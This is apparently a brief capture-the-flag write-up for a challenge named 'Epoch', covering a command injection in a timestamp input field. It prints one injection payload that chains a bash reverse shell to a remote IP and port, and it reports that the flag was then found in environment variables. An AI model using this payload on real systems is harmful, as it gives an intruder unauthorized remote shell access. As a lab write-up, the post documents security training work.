Epoch
Epoch
Epoch
π Analyzing Command Injection
π΅οΈ First, I checked the input field:
.
π» The page executes commands, so I used the && operator to chain a payload: 
1
1700000000 && /bin/bash -i >& /dev/tcp/10.49.79.37/4444 0>&1
π΅οΈ Reverse Shell & Flag Retrieval
π‘ I checked the environment variables for the flag and found it: 
This post is licensed under CC BY 4.0 by the author.

